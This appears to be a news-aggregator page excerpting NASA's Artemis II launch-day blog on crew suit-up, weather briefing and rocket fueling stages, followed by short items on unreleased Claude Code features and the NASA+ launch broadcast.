The pad res­cue team will be po­si­tioned to re­spond im­me­di­ately in the un­likely event of an emer­gency, en­sur­ing safe evac­u­a­tion pro­ce­dures for pad per­son­nel. The res­cue team is equipped with ad­vanced gear and trained for rapid crew ex­trac­tion, fire sup­pres­sion, and haz­ard mit­i­ga­tion. Their pres­ence en­sures as­tro­naut safety re­mains the top pri­or­ity, pro­vid­ing an all-im­por­tant layer of pro­tec­tion as fu­el­ing op­er­a­tions and sys­tem checks con­tinue.

The closeout crew is re­spon­si­ble for clos­ing the Orion crew mod­ule and launch abort sys­tem hatches, se­cur­ing ac­cess points, ver­i­fy­ing pad con­fig­u­ra­tions, and main­tain­ing the in­tegrity of the launch area dur­ing pro­pel­lant load­ing and sys­tem checks. Their work is crit­i­cal for guar­an­tee­ing a se­cure en­vi­ron­ment for the as­tro­nauts be­fore the launch pad is cleared for liftoff op­er­a­tions.

These teams are es­sen­tial for mit­i­gat­ing risk and sup­port­ing the com­plex chore­og­ra­phy of Artemis IIs prelaunch ac­tiv­i­ties. With both teams in place, Artemis II remains on track for its his­toric mis­sion to send as­tro­nauts around the Moon.

NASA as­tro­nauts Reid Wiseman, com­man­der; Victor Glover, pi­lot; and Christina Koch, mis­sion spe­cial­ist; along with CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen, mis­sion spe­cial­ist, are suit­ing up in­side the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agen­cy’s Kennedy Space Center in Florida.

A team of suit tech­ni­cians help the crew put on their Orion Crew Survival System suits, which are each tai­lored for mo­bil­ity and com­fort while en­sur­ing max­i­mum safety dur­ing the dy­namic phases of flight. The bright or­ange space­suits are de­signed to pro­tect them on their jour­ney and fea­ture many im­prove­ments from head to toe to the suits worn on the space shut­tle. NASA reengi­neered many el­e­ments to im­prove safety and range of mo­tion for Artemis as­tro­nauts, and in­stead of the small, medium, and large sizes from the shut­tle era, they are cus­tom fit for each crew mem­ber.

The outer layer is fire-re­sis­tant, and a stronger zip­per al­lows as­tro­nauts to quickly put the suit on. Improved ther­mal man­age­ment will help keep them cool and dry. A lighter, stronger hel­met im­proves com­fort and com­mu­ni­ca­tion, and the gloves are more durable and touch-screen com­pat­i­ble. Better-fitting boots also pro­vide pro­tec­tion in the case of fire and help an as­tro­naut move more swiftly.

The suits’ de­sign and en­gi­neer­ing en­hance­ments pro­vide an ad­di­tional layer of pro­tec­tion for as­tro­nauts and en­sure they re­turn home safely from deep space mis­sions.

During suit-up, teams will check for leaks and en­sure that all con­nect­ing life sup­port sys­tems, in­clud­ing air and power, are op­er­at­ing nom­i­nally ahead of the crew’s ride to NASA Kennedy’s Launch Complex 39B.

With NASA teams now main­tain­ing the liq­uid oxy­gen lev­els in the in­terim cryo­genic propul­sion, all cryo­genic stages of the SLS (Space Launch System) rocket have tran­si­tioned to re­plen­ish mode dur­ing the Artemis II launch count­down. This in­cludes the core stage and SLS up­per stage, en­sur­ing both liq­uid hy­dro­gen and liq­uid oxy­gen tanks re­main at flight-ready lev­els.

Replenish mode is es­sen­tial for main­tain­ing sta­ble pro­pel­lant quan­ti­ties and pres­sure as su­per-cold fu­els nat­u­rally boil off over time. Continuous ad­just­ments keep the rocket fully fu­eled and ready for ig­ni­tion, sup­port­ing the RS-25 en­gines on the core stage and the RL10 en­gine on the SLS up­per stage for their es­sen­tial roles in launch and translu­nar in­jec­tion.

These mile­stones co­in­cide with the Artemis II count­down en­ter­ing a planned 1-hour and 10-minute built-in hold. This sched­uled pause al­lows teams to com­plete cru­cial sys­tem checks, ver­ify launch readi­ness, and ad­dress any last-minute ad­just­ments be­fore pro­ceed­ing to­ward crew ingress and fi­nal fu­el­ing op­er­a­tions.

During this hold, en­gi­neers re­view data from cryo­genic load­ing, propul­sion sys­tems, and com­mu­ni­ca­tions to en­sure all pa­ra­me­ters meet strict safety and per­for­mance cri­te­ria. The hold also pro­vides flex­i­bil­ity for re­solv­ing mi­nor is­sues with­out im­pact­ing the over­all launch time­line.

Once the hold con­cludes, the count­down will re­sume with prepa­ra­tions for as­tro­naut ar­rival at Launch Pad 39B at NASAs Kennedy Space Center in Florida.

NASAs Artemis II astronauts received a fi­nal weather brief­ing in­side the Astronaut Crew Quarters of the Neil A. Armstrong Operations and Checkout Building at the agen­cy’s Kennedy Space Center in Florida, as part of prelaunch prepa­ra­tions.

This weather up­date pro­vides as­tro­nauts and mis­sion teams with the lat­est con­di­tions at NASA Kennedy’s Launch Pad 39B, the sur­round­ing re­cov­ery zones, and po­ten­tial abort sites along Artemis IIs flight path. Accurate weather fore­cast­ing is es­sen­tial for pro­tect­ing crew and hard­ware, as even mi­nor changes can im­pact count­down de­ci­sions and flight dy­nam­ics.

NASA as­tro­nauts Reid Wiseman, com­man­der; Vic­tor Glover, pi­lot; and Christina Koch, mis­sion spe­cial­ist; along with CSA (Canadian Space Agency) as­tro­naut Je­remy Hansen, mis­sion spe­cial­ist, were briefed on wind speeds, pre­cip­i­ta­tion, light­ning risk, and sea states for splash­down con­tin­gen­cies, en­sur­ing all safety cri­te­ria are met be­fore pro­ceed­ing with launch op­er­a­tions.

Weather of­fi­cials with NASA and the U. S. Space Force’s Space Launch Delta 45 are track­ing 80% fa­vor­able con­di­tions dur­ing the launch win­dow, with pri­mary con­cerns be­ing the cu­mu­lus cloud rule, flight through pre­cip­i­ta­tion rule, and ground winds.

With the weather brief­ing com­plete, the crew and ground teams re­main aligned and ready to con­tinue to­ward liftoff, keep­ing Artemis II on track for its his­toric mis­sion to send as­tro­nauts around the Moon.

NASA teams also have be­gun liq­uid oxy­gen (LOX) top­ping process for the in­terim cryo­genic propul­sion stage, or SLS (Space Launch System) rocket up­per stage, dur­ing the Artemis II launch count­down. This step fol­lows the fast fill phase and en­sures the liq­uid oxy­gen tank reaches full ca­pac­ity with su­per-cold ox­i­dizer.

Live cov­er­age of Artemis II tank­ing op­er­a­tions con­tin­ues on NASA’s YouTube chan­nel. NASAs full launch cov­er­age be­gins at 1 p.m. EDT on NASA+, Amazon Prime, and YouTube. You can con­tinue to fol­low the Artemis blog from launch to splash­down for mis­sion up­dates.

Liquid oxy­gen (LOX) fast fill is now com­plete for the SLS (Space Launch System) up­per stage, mark­ing an­other ma­jor mile­stone in tank­ing op­er­a­tions. Teams have con­firmed the up­per stage is in good shape and are pro­ceed­ing with the LOX vent and re­lief test. This step helps ver­ify proper pres­sure reg­u­la­tion and en­sures the sys­tem is ready to tran­si­tion into top­ping and, later, re­plen­ish op­er­a­tions.

NASA teams are now main­tain­ing the liq­uid oxy­gen lev­els in the SLS (Space Launch System) rocket core stage through re­plen­ish mode. This phase fol­lows the com­ple­tion of liq­uid oxy­gen fast fill and top­ping, en­sur­ing the ox­i­dizer re­mains at flight-ready lev­els through­out the fi­nal count­down.

NASA teams are in fast fill of liq­uid oxy­gen (LOX) into the in­terim cryo­genic propul­sion stage as part of the Artemis II launch count­down. This phase rapidly loads the ox­i­dizer af­ter chill­down is com­plete, bring­ing the SLS (Space Launch System) rocket up­per stage closer to full readi­ness for its role in send­ing the Orion space­craft into a high Earth or­bit ahead of a prox­im­ity op­er­a­tions demon­stra­tion test and Orion’s translu­nar in­jec­tion burn.

NASA teams have tran­si­tioned the in­terim cryo­genic propul­sion stage liq­uid hy­dro­gen tank to re­plen­ish mode dur­ing the Artemis II countdown. This phase fol­lows the suc­cess­ful top­ping process and en­sures the tank re­mains at flight-ready lev­els all the way to launch.

NASA teams have be­gun the top­ping phase for the in­terim cryo­genic propul­sion stage liq­uid hy­dro­gen (LH2) tank. This crit­i­cal step oc­curs af­ter suc­cess­ful chill­down and vent-and-re­lief checks, en­sur­ing the tank reaches full ca­pac­ity with su­per-cold liq­uid hy­dro­gen.

Replenish is the fi­nal step in the fu­el­ing process, de­signed to main­tain the cor­rect LH2 lev­els as the su­per-cold pro­pel­lant nat­u­rally boils off over time. This con­tin­u­ous, low-rate flow keeps the tanks topped off and ther­mally sta­ble, en­sur­ing the rocket re­mains fully fu­eled and ready for liftoff.

From chill­down to re­plen­ish, every phase of fu­el­ing is care­fully man­aged to pro­tect hard­ware and guar­an­tee mis­sion suc­cess. With re­plen­ish un­der­way, Artemis II is in its fi­nal stretch to­ward launch and hu­man­i­ty’s next gi­ant leap.

Topping is the process of adding small amounts of LH2 to the tanks af­ter fast fill is com­plete, en­sur­ing they re­main at full ca­pac­ity as the su­per-cold pro­pel­lant nat­u­rally boils off. This step is crit­i­cal for main­tain­ing the pre­cise lev­els needed for launch while keep­ing the sys­tem ther­mally sta­ble.

The Artemis II launch team tran­si­tioned to the fast fill of liq­uid hy­dro­gen (LH2) for the in­terim cryo­genic propul­sion stage, or SLS (Space Launch System) rocket upper stage.

After completing the chill­down phase, this step rapidly loads su­per-cold LH2 into the SLS up­per stage tanks, en­sur­ing the up­per stage is fu­eled and ready to per­form its fun­da­men­tal role of rais­ing the Orion space­craft into a high Earth or­bit ahead of a prox­im­ity op­er­a­tions demon­stra­tion test and Orion’s translu­nar in­jec­tion burn.

Fast fill ac­cel­er­ates the fu­el­ing process while main­tain­ing safety, mark­ing an­other ma­jor mile­stone in the count­down as Artemis II moves closer to liftoff.

The Artemis II launch team has be­gun the liq­uid hy­dro­gen chill­down for the in­terim cryo­genic propul­sion stage, or SLS (Space Launch System) rocket upper stage.

This process grad­u­ally cools the in­terim cryo­genic propul­sion stage fuel lines and com­po­nents to cryo­genic tem­per­a­tures us­ing su­per-cold liq­uid hy­dro­gen. The chill­down step is es­sen­tial to pre­vent ther­mal shock and en­sure the stage is prop­erly con­di­tioned for full pro­pel­lant load­ing. By sta­bi­liz­ing the sys­tem at these ex­treme tem­per­a­tures, en­gi­neers guar­an­tee safe and ef­fi­cient fu­el­ing for the up­per stage that will help po­si­tion Orion into high Earth or­bit for its jour­ney to­ward the Moon.

NASA as­tro­nauts Reid Wiseman, Victor Glover, and Christina Koch, along with CSA (Canadian Space Agency) as­tro­naut Je­remy Hansen have of­fi­cially be­gun their launch day with a sched­uled wake-up call at 9:25 a.m., mark­ing the start of their fi­nal prepa­ra­tions for the his­toric Artemis II mis­sion around the Moon.

The Artemis II launch team tran­si­tioned to the fast fill of liq­uid hy­dro­gen (LH2) into the SLS (Space Launch System) rocket core stage.

...

Read the original on www.nasa.gov »

9 1,050 shares, 41 trendiness

Claude Code Unpacked

Stuff that’s in the code but not shipped yet. Feature-flagged, env-gated, or just com­mented out.

A vir­tual pet that lives in your ter­mi­nal. Species and rar­ity are de­rived from your ac­count ID. Persistent mode with mem­ory con­sol­i­da­tion be­tween ses­sions and au­tonomous back­ground ac­tions.Long plan­ning ses­sions on Opus-class mod­els, up to 30-minute ex­e­cu­tion win­dows.Con­trol Claude Code from your phone or a browser. Full re­mote ses­sion with per­mis­sion ap­provals.Run ses­sions in the back­ground with –bgtmuxSessions talk to each other over Unix do­main sock­ets.Be­tween ses­sions, the AI re­views what hap­pened and or­ga­nizes what it learned.

...

Read the original on ccunpacked.dev »

10 1,027 shares, 42 trendiness

NASA’s Artemis II Crew Launches to the Moon (Official Broadcast)

Artemis II is NASAs first crewed mis­sion un­der the Artemis pro­gram and will launch from the agen­cy’s Kennedy Space Center in Florida. It will send NASA as­tro­nauts Reid Wiseman, Victor Glover, Christina Koch, and CSA (Canadian Space Agency) as­tro­naut Jeremy Hansen on an ap­prox­i­mately 10-day jour­ney around the Moon. Among ob­jec­tives, the agency will test the Orion space­craft’s life sup­port sys­tems for the first time with peo­ple and lay the ground­work for fu­ture crewed Artemis mis­sions.

...

Read the original on plus.nasa.gov »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.